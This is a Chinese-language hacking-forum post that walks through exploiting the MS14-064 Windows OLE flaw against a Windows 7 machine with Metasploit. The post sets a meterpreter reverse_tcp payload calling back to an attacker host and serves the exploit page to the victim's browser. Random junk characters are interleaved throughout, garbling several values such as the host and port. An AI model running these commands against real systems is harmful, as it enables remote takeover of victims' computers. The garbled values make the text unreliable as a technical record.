找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2018|回复: 0
打印 上一主题 下一主题

MS14-064 漏洞测试入侵win7

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:20:35 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

, K1 l+ G Z# |6 \8 A 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示4 A& R2 H2 P; @% O% P9 S5 \

) Y+ F8 h0 a7 [. T* b: Y/ _0 `" O

) n9 M; ~# |3 j 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: * C+ h" v; m! e; G8 s) l0 E0 p

7 I- a3 r& h8 @ H4 N

6 s* D- G) W- k9 d% o J4 n3 f 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp$ h) t- V4 P5 G5 g1 P( T

* }1 E2 M B5 l& V7 N2 G

- A5 ~) H/ p. @: o& @3 U1 I9 @$ |             set AllowPowershellPrompt true " i `" u; E0 b' S2 \) P- c

' X3 Y% r6 `( o( Q6 |

7 O! j* R1 O+ D( B* X4 k+ H             Set LHOST 192.168.0.109 # `# U" F# g' r9 z, l+ k/ s

+ g) X/ `3 k2 P4 w# r/ Y

5 a0 d% s# n6 Y+ `% O             set SRVHOST 192.168.0.1091 I2 |8 o; A1 e6 x! j, Y

8 R* {7 `8 H% ^" a4 Y; U' L. f

3 C6 e: Z3 [; E, q             Set uripath share0 j+ E% W6 p: F1 y) I: U% {* Z

K1 `8 t: o& r8 p! c& k

E$ W T# w- G3 v, Z             Set srvport 805 n$ _ I# b1 E: u8 B

9 D3 P: ]+ E) i$ N7 f$ ?( \

( j1 X0 L* O# z% Z1 ^1 e  * U$ O8 f4 v# ^. Q1 U- @

/ l+ z( v% `! ~9 v

) l. Y+ R; L+ e# {8 _) M   : _3 Q& a6 ^; b) u

% N# I1 E/ G0 A, M8 G" r

G D( z, k# Q9 |; s' W& ]   3 z; A$ S# ?1 ~

1 G4 u6 [* K; e- P1 t

9 E8 A5 J. c, h  / B2 Z! a, K4 Q" @

# W8 {0 i" L! W" s6 f; {

$ O) E, D f3 C7 O% z8 i   , e( [, D7 h* r% B- P! L/ ^

$ W! c$ L& D) \9 v

2 ?9 }! N' }8 r8 j7 e W- [ 下面我们来访问本地地址如图:* l& m# J% o) K& I

) C: S8 j4 X0 s( L' n& d

3 ?) |: S% w) h5 H* U  + a5 t7 H% @; N( `3 P

# |4 V" o4 T0 ^" H) a$ p. t

; p0 j1 `0 G* K7 F# P# H   " C ?' m8 G8 Q2 [( v$ H

& x# @: J" ^- r, T5 \# s3 Y

0 E6 _+ t2 ?- E6 [' _& D, Q# c" g7 a$ s ; `+ k4 a5 m$ H& y |0 }

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表